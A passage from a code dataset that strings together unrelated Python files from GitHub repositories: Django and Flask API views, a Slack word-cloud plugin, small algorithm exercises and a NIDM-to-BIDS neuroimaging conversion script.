figsize=(20,10), facecolor='k')\n plt.imshow(wordcloud)\n plt.axis(\"off\")\n plt.tight_layout(pad=0)\n plt.savefig(filepath, facecolor='k', bbox_inches='tight')\n\n # wordcloud.to_file(filepath)\n file = open(filepath, 'rb')\n self.client.api_call(\"files.upload\", channels=channel,\n file=file,\n initial_comment=\"WordCloud Generated!\") ","repo_name":"Avishek-Paul/SlackAssistant","sub_path":"plugins/wordCloudPlugin.py","file_name":"wordCloudPlugin.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34701158134","text":"import logging\n\nfrom nextcloud_news_updater.config import Config\n\n\nclass Logger:\n def __init__(self, config: Config) -> None:\n log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(format=log_format)\n self.logger = logging.getLogger('Nextcloud News Updater')\n if config.loglevel == 'info':\n self.logger.setLevel(logging.INFO)\n else:\n self.logger.setLevel(logging.ERROR)\n\n def info(self, message: str) -> None:\n self.logger.info(message)\n\n def error(self, message: str) -> None:\n self.logger.error(message)\n","repo_name":"nextcloud/news-updater","sub_path":"nextcloud_news_updater/common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"78"} +{"seq_id":"72618123772","text":"from rest_framework import viewsets\nfrom rest_framework import serializers\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import OfferListSerializer\nfrom .models import OfferListModel\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.decorators import api_view, permission_classes\n\ndef get_object(pk):\n try:\n return OfferListModel.objects.get(pk=pk)\n except:\n return None\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get(request):\n if request.query_params:\n items = OfferListModel.objects.filter(**request.query_params.dict())\n else:\n items = OfferListModel.objects.all()\n\n if items:\n serializer = OfferListSerializer(items, many=True)\n return Response(serializer.data)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': \"page not found\"})\n\n\n@api_view(['POST'])\ndef create(request):\n item = OfferListSerializer(data=request.data)\n if item.is_valid():\n item.save()\n return Response(item.data)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': item.errors})\n\n\n@api_view(['GET'])\ndef read(request, pk):\n item = get_object(pk=pk)\n if item:\n data = OfferListSerializer(item)\n if data:\n return Response(data.data)\n\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': \"page not found\"})\n\n\n@api_view(['PUT'])\ndef update(request, pk):\n item = get_object(pk=pk)\n data = OfferListSerializer(instance=item, data=request.data)\n\n if data.is_valid():\n data.save()\n return Response(data.data)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND, data={'error': data.errors})\n\n\n@api_view(['GET', 'DELETE'])\ndef delete(request, pk):\n item = get_object(pk=pk)\n if item:\n item.delete()\n return Response(status=status.HTTP_202_ACCEPTED, data={'status': \"successful deleted\"})\n","repo_name":"tatsuhidehirakawa/django-postgresql-example","sub_path":"s_01_src/124dja_src/contracts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71978045373","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index),\n path('back', views.back, name=\"back\"),\n path('log_in', views.log_in_page_render, name=\"log_in\"),\n path('home_page', views.home_page_render, name=\"home_page\"),\n path('register_page', views.register_page_render, name=\"register_page\"),\n path('user_profile_page/', views.user_profile_page, name=\"user_profile\"),\n path('add_entry_page', views.add_entry_page, name=\"add_entry_page\"),\n path('deities_by_religion/', views.deities_by_religion_page, name=\"deities_by_religion\"),\n path('deities_by_location/', views.deities_by_location_page, name=\"deities_by_religion\"),\n path('deity_info_page/', views.deity_info_page, name=\"deity_info\"),\n path('register', views.register, name=\"register\"),\n path('logout', views.logout, name=\"logout\"),\n path('login', views.login, name=\"login\"),\n path('searchbar', views.searchbar, name=\"searchbar\"),\n path('add_deity', views.add_deity, name=\"add_deity\"),\n path('deity_edit_page/', views.deity_edit_page, name=\"deity_edit_page\"),\n path('edit_deity/', views.edit_deity, name=\"edit_deity\"),\n path('genCSV', views.generateCSV, name=\"genCSV\"),\n path('wiki_sum/', views.wiki_sum_page, name=\"wiki_sum\"),\n path('wiki_error', views.wiki_error, name=\"wiki_error\")\n]","repo_name":"JpBongiovanni/WDD2","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16441838939","text":"import genslides.utils.reqhelper as ReqHelper\nimport genslides.utils.request as Requester\n\nfrom genslides.commands.create import CreateCommand\nfrom genslides.helpers.singleton import Singleton\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\nimport json\n\nfrom genslides.utils.largetext import SimpleChatGPT\n\nclass TaskManager(metaclass=Singleton):\n def __init__(self) -> None:\n self.task_id = 0\n self.task_list = []\n self.model_list = []\n chat = SimpleChatGPT()\n self.model_list = chat.getModelNames()\n\n def getId(self, task) -> int:\n id = self.task_id\n self.task_id += 1\n if task not in self.task_list:\n self.task_list.append(task)\n return id\n \n def getPath(self) -> str:\n if not os.path.exists(\"saved\"):\n os.makedirs(\"saved\")\n return \"saved/\"\n \n def getLinks(self):\n mypath = self.getPath()\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n out = []\n for filename in onlyfiles:\n path = join(mypath,filename)\n try:\n with open(path, 'r') as f:\n rq = json.load(f)\n if 'linked' in rq:\n\n pair = {}\n pair['name'] = filename.split('.')[0]\n pair['linked'] = rq['linked']\n out.append(pair)\n except Exception as e:\n pass\n return out\n\n \n def getParentTaskPrompts(self):\n mypath = self.getPath()\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n out = []\n for filename in onlyfiles:\n path = join(mypath,filename)\n try:\n with open(path, 'r') as f:\n rq = json.load(f)\n if 'parent' in rq:\n print(path)\n parent_path = rq['parent']\n if parent_path == \"\" and 'chat' in rq and 'type' in rq:\n print(path)\n \n for elem in rq['chat']:\n if elem['role'] == 'user':\n pair = {\n 'type' : rq['type'],\n 'content' : elem['content']\n }\n out.append(pair)\n except Exception as e:\n pass\n return out\n\n def getTaskPrompts(self, trg_path = \"\"):\n mypath = self.getPath()\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n out = []\n for filename in onlyfiles:\n path = join(mypath,filename)\n try:\n with open(path, 'r') as f:\n rq = json.load(f)\n if 'parent' in rq:\n # print(path):w\n\n parent_path = rq['parent']\n if parent_path == trg_path and 'chat' in rq and 'type' in rq:\n print(\"Get propmt from=\",path)\n # if rq['type'].endswith(\"RichText\") or rq['type'].endswith(\"Response\"):\n if len(rq['chat']) == 0:\n elem = {'role': 'user','content': ''}\n else:\n if rq['type'] == \"RichText\":\n elem = rq['chat'].pop()\n elem = rq['chat'].pop()\n pair = {}\n # pair['type'] = rq['type']\n pair['type'] =filename.split('.')[0] \n pair['content'] = elem['content']\n pair['role'] = elem['role']\n\n out.append(pair)\n \n # for elem in rq['chat']:\n # if elem['role'] == 'user':\n # pair = {}\n # pair['type'] = rq['type']\n # pair['content'] = elem['content']\n # out.append(pair)\n except Exception as e:\n print(\"error=\", type(e))\n return out\n\n\n\n\nclass TaskDescription():\n def __init__(self, prompt = \"\", method = None, parent=None, helper=None, requester=None, target=None, id = 0, type = \"\", prompt_tag = \"user\", filename = \"\", enabled = False, params = [], manual = False) -> None:\n self.prompt = prompt\n self.prompt_tag = prompt_tag\n self.method = method\n self.parent = parent\n self.helper = helper\n self.requester = requester\n self.target = target\n self.id = id\n self.type = type\n self.filename = filename\n self.enabled = enabled\n self.params = params\n self.manual = manual\n\nclass BaseTask():\n def __init__(self, task_info : TaskDescription, type = 'None') -> None:\n self.childs = []\n self.is_solved = False\n self.reqhelper = task_info.helper\n self.requester = task_info.requester\n self.crtasklist = []\n\n type = task_info.type\n self.type = type\n self.init = self.reqhelper.getInit(type)\n self.endi = self.reqhelper.getEndi(type)\n\n self.prompt = task_info.prompt\n self.prompt_tag = task_info.prompt_tag\n \n self.method = task_info.method\n task_manager = TaskManager()\n self.id = task_manager.getId(self)\n request = self.init + self.prompt + self.endi\n self.task_description = \"Task type = \" + self.type + \"\\nRequest:\\n\" + request\n self.task_creation_result = \"Results of task creation:\\n\"\n\n self.parent = task_info.parent\n self.is_freeze = False\n if self.parent:\n self.parent.addChild(self)\n if self.parent.is_freeze:\n self.is_freeze = True\n self.target = task_info.target\n self.filename = task_info.filename\n\n self.affect_to_ext_list = []\n self.by_ext_affected_list = []\n self.name = self.type + str(self.id)\n \n \n def freezeTask(self):\n self.is_freeze = True\n # self.update()\n\n def unfreezeTask(self):\n self.is_freeze = False\n # self.update()\n\n def getRichPrompt(self) -> str:\n out = self.prompt\n if not out.startswith(self.init):\n out = self.init + out\n if not out.endswith(self.endi):\n out += self.endi\n for task in self.by_ext_affected_list:\n out += \" \" + task.prompt\n return out\n \n def getJson(self):\n return None\n \n\n def getIdStr(self) -> str:\n return str(self.id)\n \n def getName(self) -> str:\n return self.name\n\n def getAncestorByName(self, trg_name):\n index = 0\n task = self\n while(index < 1000):\n if task.parent != None:\n if task.parent.getName() != trg_name:\n task = task.parent\n else:\n return task.parent\n else:\n break\n index += 1\n return None\n\n def getNewID(self) -> int:\n task_manager = TaskManager()\n self.id = task_manager.getId(self)\n return self.id\n\n\n def addChildToCrList(self, task : TaskDescription):\n self.crtasklist.append(task)\n\n def isSolved(self):\n return self.is_solved\n \n def checkChilds(self):\n for child in self.childs:\n if not child.isSolved():\n return False\n return True\n\n def addChild(self, child):\n if child not in self.childs:\n self.childs.append(child)\n\n def getCmd(self):\n if len(self.crtasklist) > 0:\n task = self.crtasklist.pop()\n print('Register command:' + str(task.method))\n return CreateCommand( task)\n return None\n \n def stdProcessUnFreeze(self, input=None):\n if self.parent:\n self.is_freeze = self.parent.is_freeze\n else:\n pass\n\n def updateIternal(self, input : TaskDescription = None):\n pass\n \n def update(self, input : TaskDescription = None):\n self.stdProcessUnFreeze(input)\n\n if input:\n if input.parent:\n self.parent = input.parent\n self.parent.addChild(self)\n print(\"New parent=\", self.parent)\n \n print(\"Update=\",self.getName(), \"|frozen=\", self.is_freeze, \"||\")\n self.updateIternal(input)\n\n for child in self.childs:\n child.update()\n\n\n self.useLinksToTask()\n\n # if not self.is_freeze:\n\n return \"\",\"\",\"\"\n \n def getMsgInfo(self):\n return \"\",\"\",\"\"\n \n def getInfo(self, short = True) -> str:\n return \"Some description\"\n\n\n def beforeRemove(self):\n if self.parent:\n self.parent.childs.remove(self)\n for child in self.childs:\n child.whenParentRemoved()\n\n def whenParentRemoved(self):\n self.parent = None\n\n def removeParent(self):\n if self.parent:\n self.parent.childs.remove(self)\n self.parent = None\n \n\n def getCountPrice(self):\n return 0,0\n \n def affectedTaskCallback(self, input : TaskDescription):\n pass\n\n def createLinkToTask(self, task) -> TaskDescription:\n pass\n # id = len(self.by_ext_affected_list)\n # out = TaskDescription(method=self.affectedTaskCallback, id=id, parent=task )\n # self.by_ext_affected_list.append(out)\n # task.setLinkToTask(out)\n # return out\n \n def removeLinkToTask(self):\n while len(self.by_ext_affected_list) > 0:\n input = self.by_ext_affected_list.pop()\n input.parent.resetLinkToTask(input)\n \n \n def setLinkToTask(self, info : TaskDescription) -> None:\n self.affect_to_ext_list.append(info)\n\n def resetLinkToTask(self, info : TaskDescription) -> None:\n self.affect_to_ext_list.remove(info)\n\n def useLinksToTask(self):\n input = TaskDescription(prompt=self.prompt)\n for task in self.affect_to_ext_list:\n input.id = task.id\n task.method(input)\n\n def completeTask(self) -> bool:\n # print(self.getName(),\"=Complete Task\")\n return False \n \n def getParam(self, param_name):\n return None\n ","repo_name":"artemopolus/genslides","sub_path":"genslides/task/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31647542759","text":"from django.core.management.base import BaseCommand\nfrom core.management.commands.utils import get_random_values_from_list\nfrom users.models import Interest\n\n\nclass Command(BaseCommand):\n\n FAKE_INTERESTS = [\n ('sports', 'Sports'),\n ('programming', 'Programming'),\n ('party', 'Party'),\n ('travel', 'Travel'),\n ('hiking', 'Hiking'),\n ('art', 'Art'),\n ('football', 'Football'),\n ('formula1', 'Formula 1')\n ]\n\n def handle(self, *args, **options):\n\n for interest in self.FAKE_INTERESTS:\n name, value = interest\n\n Interest.objects.create(name=name, value=value)\n self.stdout.write(self.style.SUCCESS('Imported interest: {}'.format(value)))\n self.stdout.write(self.style.SUCCESS('Imported {} interests'.format(len(self.FAKE_INTERESTS))))\n","repo_name":"pr0grammr/mini-users-api","sub_path":"users/management/commands/createfakeinterests.py","file_name":"createfakeinterests.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2110890774","text":"import csv\nimport re\n\ndef read_firms(filePath):\n with open(filePath, 'r') as f:\n reader = csv.reader(f)\n your_list = list(reader)\n flatten = lambda l: [item for sublist in l for item in sublist]\n firms = flatten(your_list)\n\n pattern = re.compile(r\"\\w+\\b(? List[str]:\n from functools import lru_cache\n def _possible(s, words):\n dp = [False] * (n+1)\n dp[0] = True\n for i in range(n+1):\n for j in range(i-1, -1, -1):\n if dp[j] and s[j:i] in words:\n dp[i] = True\n break\n return dp[n]\n\n n = len(s)\n ws = set(wordDict)\n if not _possible(s, ws): return []\n @lru_cache(None)\n def helper(i):\n res = []\n if i == n:\n res.append(\"\")\n for j in range(i+1, n+1):\n if s[i:j] in ws:\n back = helper(j)\n for e in back:\n cur = s[i:j] + \" \" + e if e != \"\" else s[i:j]\n res.append(cur)\n return res\n return helper(0)\n\nif __name__ == '__main__':\n a = Solution()\n a.wordBreak(s = \"catsanddog\", wordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"])\n a.wordBreak(s = \"pineapplepenapple\", wordDict = [\"apple\", \"pen\", \"applepen\", \"pine\", \"pineapple\"])\n a.wordBreak(s = \"catsandog\", wordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/1-300/140.py","file_name":"140.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"7127348104","text":"#!/usr/bin/python3\n\"\"\"\nThis file contains the User module\n\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models import storage\nfrom models.user import User\nfrom flasgger.utils import swag_from\n\n\n@app_views.route('/users', methods=['GET'], strict_slashes=False)\n@swag_from('documentation/user/get.yml', methods=['GET'])\ndef get_all_users():\n \"\"\" get users by id\"\"\"\n all_list = [obj.to_dict() for obj in storage.all(User).values()]\n return jsonify(all_list)\n\n\n@app_views.route('/users/', methods=['GET'],\n strict_slashes=False)\n@swag_from('documentation/user/get_id.yml', methods=['GET'])\ndef get_user(user_id):\n \"\"\" get user by id\"\"\"\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n return jsonify(user.to_dict())\n\n\n@app_views.route('/users/', methods=['DELETE'],\n strict_slashes=False)\n@swag_from('documentation/user/delete.yml', methods=['DELETE'])\ndef del_user(user_id):\n \"\"\" delete user by id\"\"\"\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n user.delete()\n storage.save()\n return jsonify({})\n\n\n@app_views.route('/users/', methods=['POST'],\n strict_slashes=False)\n@swag_from('documentation/user/post.yml', methods=['POST'])\ndef create_obj_user():\n \"\"\" create new instance \"\"\"\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n if 'email' not in request.get_json():\n return make_response(jsonify({\"error\": \"Missing email\"}), 400)\n if 'password'not in request.get_json():\n return make_response(jsonify({\"error\": \"Missing password\"}), 400)\n js = request.get_json()\n obj = User(**js)\n obj.save()\n return (jsonify(obj.to_dict()), 201)\n\n\n@app_views.route('/users/', methods=['PUT'],\n strict_slashes=False)\n@swag_from('documentation/user/put.yml', methods=['PUT'])\ndef post_user(user_id):\n \"\"\" \"\"\"\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n obj = storage.get(User, user_id)\n if obj is None:\n abort(404)\n for key, value in request.get_json().items():\n if key not in ['id', 'email', 'created_at', 'updated']:\n setattr(obj, key, value)\n storage.save()\n return jsonify(obj.to_dict())\n","repo_name":"AdeVickie/AirBnB_clone_v3","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7379228874","text":"# pivot을 기준으로 쪼갭니다\ndef zzogaeggi (list, low, high):\n\n # pivot 값 정하기\n pivot = list[high]\n\n \n # i는 피봇을 기준으로\n # list를 정렬해주는 역할입니다.\n\n i = low - 1\n print(\"\")\n print(\"pivot:\", pivot)\n\n # j를 통해서 list를 훑습니다.\n for j in range(low, high) :\n\n if list[j] < pivot :\n\n i = i + 1\n # Swap\n list[i], list[j] = list[j], list[i]\n print(\"list:\", list)\n\n # 마지막으로\n #pivot이 들어갈 위치를 바꿔줍니다.\n list[i+1], list[high] = list[high], list[i+1]\n print(\"list_after_pivot:\", list)\n\n return i +1\n \n\n\ndef quickSort(list, low, high):\n\n # pivot이 알맞은 위치에 있어서\n # QuickSort를 실행해줘도 되는지 확인하는 부분\n\n if low < high :\n\n # pivot 기준으로 쪼개기 위해서, pivot 위치를 가져옵니다.\n pivot_position = zzogaeggi(list, low, high)\n\n #그리고 왼쪽과 오른쪽 부분을 쪼갭니다.\n quickSort(list, low, pivot_position - 1)\n quickSort(list, pivot_position + 1, high)\n\n\n\n# list를 쪼개는 과정은 merge sort처럼 O(log2(n))\n# 크기 비교하면서 정렬 O(n)\n# pivot이 계속 가장 큰 수/ 가장 작은수가 나올때\n# worst case가 존재 O(n^2)\n# 쪼개는 과정이 O(n)\n\nlist = [10, 80, 30, 90, 40, 50, 70]\nn = len(list)\nquickSort(list, 0, n-1)\nprint(list)\n","repo_name":"Tempnixk/DataStructure-Algorithm","sub_path":"Quick_Sort.py","file_name":"Quick_Sort.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17179224298","text":"try:\n a = int(input())\n check = a\n temp = -1\n count = 0\n if a<0 or a>100:\n raise ValueError(\"Invalid input\")\nexcept ValueError as e:\n print(e)\nelse:\n while check!=temp:\n count += 1\n a01 = a%10\n a10 = a//10\n temp = a01*10 + (a10 + a01)%10\n a = temp\n print(count)","repo_name":"parkbyungnam/Algorithm_study","sub_path":"baejoon/기초/1110.py","file_name":"1110.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11455684402","text":"\n\nfrom nndct_shared.base import NNDCT_OP\n\n\nclass ReshapeMergeHandler(object):\n def __init__(self):\n self.visited = set()\n \n def __call__(self, *args, **kwargs):\n _, node_set = args\n reshape_0 = node_set[0]\n reshape_1 = node_set[1]\n\n if reshape_0 in self.visited or reshape_1 in self.visited:\n return \n \n self.visited.add(reshape_0)\n self.visited.add(reshape_1)\n \n uses = list(reshape_0.out_tensors[0].uses)\n for use in uses:\n if use.user.op.type == NNDCT_OP.RESHAPE:\n use.user.replace_input_at(use.offset, reshape_0.in_tensors[0])\n ","repo_name":"Xilinx/Vitis-AI","sub_path":"src/vai_quantizer/vai_q_pytorch/nndct_shared/optimization/merge_reshape.py","file_name":"merge_reshape.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1266,"dataset":"github-code","pt":"78"} +{"seq_id":"23995329286","text":"\"\"\"\nThis program will convert a NIDM-Experiment RDF document to a BIDS dataset.\nThe program will query the NIDM-Experiment document for subjects, MRI scans,\nand associated assessments saving the MRI data to disk in an organization\naccording to the BIDS specification, the demographics metadata to a\nparticipants.tsv file, the project-level metadata to a dataset_description.json\nfile, and the assessments to *.tsv/*.json file pairs in a phenotypes directory.\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom io import StringIO\nimport json\nimport os\nfrom os import mkdir, system\nfrom os.path import basename, isdir, isfile, join, splitext\nfrom shutil import copyfile\nimport sys\nimport tempfile\nimport urllib.parse\nimport datalad.api as dl\nimport pandas as pd\nfrom rdflib import Graph, URIRef\nimport requests\nimport validators\nfrom nidm.core import BIDS_Constants, Constants\nfrom nidm.core.Constants import DD\nfrom nidm.experiment.Query import (\n GetParticipantIDFromAcquisition,\n GetProjectLocation,\n GetProjectsUUID,\n)\nfrom nidm.experiment.Utils import read_nidm, write_json_mapping_file\n\n\ndef GetImageFromAWS(location, output_file, args):\n \"\"\"\n This function will attempt to get a BIDS image identified by location from AWS S3. It only\n supports known URLs at this time (e.g. openneuro)\n :param location: path string to file. This can be a local path. Function will try and detect if this\n is a known project/archive and if so will format theh S3 string appropriately. Otherwise it will return None\n :param output_file: This is the full path and filename to store the S3 downloaded file if successful\n :return: None if file not downloaded else will return True\n \"\"\"\n\n print(f\"Trying AWS S3 for dataset: {location}\")\n # modify location to remove everything before the dataset name\n # problem is we don't know the dataset identifier inside the path string because\n # it doesn't have any constraints. For openneuro datasets they start with \"ds\" so\n # we could pick that out but for others it's difficult (impossible)?\n\n # case for openneuro\n if \"openneuro\" in location:\n # remove everything from location string before openneuro\n openneuro_loc = location[location.find(\"openneuro/\") + 10 :]\n # get a temporary directory for this file\n temp_dir = tempfile.mkdtemp()\n # aws command\n cmd = (\n \"aws s3 cp --no-sign-request \"\n + \"s3://openneuro.org/\"\n + openneuro_loc\n + \" \"\n + temp_dir\n )\n # execute command\n print(cmd)\n system(cmd)\n # check if aws command downloaded something\n if not isfile(join(temp_dir, basename(location))):\n print(\"Couldn't get dataset from AWS either...\")\n return None\n else:\n try:\n # copy file from temp_dir to bids dataset\n print(\"Copying temporary file to final location....\")\n copyfile(join(temp_dir, basename(location)), output_file)\n return True\n except Exception:\n print(\"Couldn't get dataset from AWS either...\")\n return None\n # if user supplied a URL base, add dataset, subject, and file information to it and try to download the image\n elif args.aws_baseurl:\n aws_baseurl = args.aws_baseurl\n # check if user supplied the last '/' in the aws_baseurl or not. If not, add it.\n if aws_baseurl[-1] != \"/\":\n aws_baseurl = aws_baseurl = \"/\"\n # remove everything from location string before openneuro\n loc = location[location.find(args.dataset_string) + len(args.dataset_string) :]\n # get a temporary directory for this file\n temp_dir = tempfile.mkdtemp()\n # aws command\n cmd = \"aws s3 cp --no-sign-request \" + aws_baseurl + loc + \" \" + temp_dir\n # execute command\n print(cmd)\n system(cmd)\n # check if aws command downloaded something\n if not isfile(join(temp_dir, basename(location))):\n print(\"Couldn't get dataset from AWS either...\")\n return None\n else:\n try:\n # copy file from temp_dir to bids dataset\n print(\"Copying temporary file to final location....\")\n copyfile(join(temp_dir, basename(location)), output_file)\n return True\n except Exception:\n print(\"Couldn't get dataset from AWS either...\")\n return None\n\n\ndef GetImageFromURL(url):\n \"\"\"\n This function will try and retrieve the file referenced by url\n :param url: url to file to download\n :return: temporary filename or -1 if fails\n \"\"\"\n\n # try to open the url and get the pointed to file\n try:\n # open url and get file\n with requests.get(url, stream=True) as r:\n r.raise_for_status()\n # write temporary file to disk and use for stats\n with tempfile.NamedTemporaryFile(delete=False) as temp:\n for chunk in r.iter_content(65535):\n temp.write(chunk)\n temp.flush()\n return temp.name\n except Exception:\n print(f\"ERROR! Can't open url: {url}\")\n return -1\n\n\ndef GetDataElementMetadata(nidm_graph, de_uuid):\n \"\"\"\n This function will query the nidm_graph for the DataElement de_uuid and return all the metadata as a BIDS-compliant\n participants sidecar file dictionary\n \"\"\"\n\n # query nidm_graph for Constants.NIIRI[de_uuid] rdf:type PersonalDataElement\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX niiri: \n PREFIX nidm: \n\n select distinct ?p ?o\n where {{\n\n <{Constants.NIIRI[de_uuid]}> rdf:type nidm:PersonalDataElement ;\n ?p ?o .\n }}\n \"\"\"\n\n # print(query)\n qres = nidm_graph.query(query)\n\n # set up a dictionary entry for this column\n # current_tuple = str(DD(source=\"participants.tsv\", variable=column))\n\n # temporary dictionary of metadata\n temp_dict = {}\n # add info to BIDS-formatted json sidecar file\n for row in qres:\n temp_dict[str(row[0])] = str(row[1])\n\n # set up a dictionary entry for this column\n current_tuple = str(\n DD(\n source=\"participants.tsv\",\n variable=temp_dict[\"http://purl.org/nidash/nidm#sourceVariable\"],\n )\n )\n\n de = {}\n de[current_tuple] = {}\n # now look for label entry in temp_dict and set up a proper NIDM-style JSON data structure\n # see Utils.py function map_variables_to_terms for example (column_to_terms[current_tuple])\n for key, value in temp_dict.items():\n if key == \"http://purl.org/nidash/nidm#sourceVariable\":\n de[current_tuple][\"source_variable\"] = value\n elif key == \"http://purl.org/dc/terms/description\":\n de[current_tuple][\"description\"] = value\n elif key == \"http://purl.org/nidash/nidm#isAbout\":\n # here we need to do an additional query to see if there's a label associated with the isAbout value\n de[current_tuple][\"isAbout\"] = []\n\n # check whether there are multiple 'isAbout' entries\n if isinstance(value, \"list\"):\n # if this is a list we have to loop through the entries and store the url and labels\n for entry in value:\n # query for label for this isAbout URL\n query = f\"\"\"\n\n prefix prov: \n prefix rdfs: \n prefix rdf: \n\n select distinct ?label\n where {{\n <{entry}> rdf:type prov:Entity ;\n rdfs:label ?label .\n }}\n \"\"\"\n # print(query)\n qres = nidm_graph.query(query)\n\n for row in qres:\n de[current_tuple][\"isAbout\"].append(\n {\"@id\": value, \"label\": row[0]}\n )\n else:\n # only 1 isAbout entry\n # query for label for this isAbout URL\n query = f\"\"\"\n\n prefix prov: \n prefix rdfs: \n prefix rdf: \n\n select distinct ?label\n where {{\n <{value}> rdf:type prov:Entity ;\n rdfs:label ?label .\n }}\n \"\"\"\n # print(query)\n qres = nidm_graph.query(query)\n for row in qres:\n de[current_tuple][\"isAbout\"].append({\"@id\": value, \"label\": row[0]})\n\n elif key == \"http://www.w3.org/2000/01/rdf-schema#label\":\n de[current_tuple][\"label\"] = value\n elif key == \"http://purl.org/nidash/nidm#valueType\":\n if \"responseOptions\" not in de[current_tuple].keys():\n de[current_tuple][\"responseOptions\"] = {}\n de[current_tuple][\"responseOptions\"][\"valueType\"] = value\n else:\n de[current_tuple][\"responseOptions\"][\"valueType\"] = value\n elif key == \"http://purl.org/nidash/nidm#levels\":\n if \"responseOptions\" not in de[current_tuple].keys():\n de[current_tuple][\"responseOptions\"] = {}\n de[current_tuple][\"responseOptions\"][\"levels\"] = value\n else:\n de[current_tuple][\"responseOptions\"][\"levels\"] = value\n elif key == \"http://uri.interlex.org/ilx_0739289\":\n de[current_tuple][\"associatedWith\"] = value\n elif key == Constants.NIDM[\"minValue\"]:\n de[current_tuple][\"responseOptions\"][\"minValue\"] = value\n elif key == Constants.NIDM[\"maxValue\"]:\n de[current_tuple][\"responseOptions\"][\"maxValue\"] = value\n elif key == Constants.NIDM[\"url\"]:\n de[current_tuple][\"url\"] = value\n\n return de\n\n\ndef CreateBIDSParticipantFile(nidm_graph, output_file, participant_fields):\n \"\"\"\n Creates participant file based on requested fields\n\n :param nidm_graph:\n :param output_directory:\n :param fields:\n :return:\n \"\"\"\n\n print(\"Creating participants.json file...\")\n fields = [\"participant_id\"]\n # fields.extend(participant_fields)\n participants = pd.DataFrame(columns=fields, index=[1])\n participants_json = {}\n\n # for each Constants.NIDM_SUBJECTID in NIDM file\n row_index = 1\n for subj_uri, subj_id in nidm_graph.subject_objects(\n predicate=URIRef(Constants.NIDM_SUBJECTID.uri)\n ):\n # adding subject ID to data list to append to participants data frame\n participants.loc[\n row_index,\n \"participant_id\",\n ] = subj_id\n\n # for each of the fields in the participants list\n for fields in participant_fields:\n # if field identifier isn't a proper URI then do a fuzzy search on the graph, else an explicit search for the URL\n if validators.url(fields):\n # then this is a valid URI so simply query nidm_project document for it\n for _, obj in nidm_graph.subject_objects(\n predicate=URIRef(BIDS_Constants.participants[fields].uri)\n ):\n # add row to the pandas data frame\n # data.append(obj)\n participants.loc[\n row_index, BIDS_Constants.participants[fields].uri\n ] = obj\n\n # find Data Element and add metadata to participants_json dictionary\n\n else:\n # text matching task, remove basepart of URIs and try to fuzzy match the field in the part_fields parameter string\n # to the \"term\" part of a qname URI...this part let's a user simply ask for \"age\" for example without knowing the\n # complete URI....hopefully\n #\n # This needs to be a more complex query:\n # Step(1): For subj_uri query for prov:Activity that were prov:wasAttributedTo subj_uri\n # Step(2): Query for prov:Entity that were prov:wasGeneratedBy uris from Step(1)\n # Step(3): For each metadata triple in objects whose subject is uris from Step(2), fuzzy match predicate after\n # removing base of uri to \"fields\" in participants list, then add these to data list for appending to pandas\n #\n # Steps(1):(3)\n\n query = f\"\"\"\n PREFIX rdf: \n PREFIX prov: \n PREFIX onli: \n PREFIX sio: \n PREFIX niiri: \n\n SELECT DISTINCT ?pred ?value\n WHERE {{\n ?asses_activity prov:qualifiedAssociation ?_blank .\n ?_blank rdf:type prov:Association ;\n prov:agent <{subj_uri}> ;\n prov:hadRole sio:Subject .\n\n ?entities prov:wasGeneratedBy ?asses_activity ;\n rdf:type onli:assessment-instrument ;\n ?pred ?value .\n FILTER (regex(str(?pred) ,\"{fields}\",\"i\" ))\n }}\"\"\"\n # print(query)\n 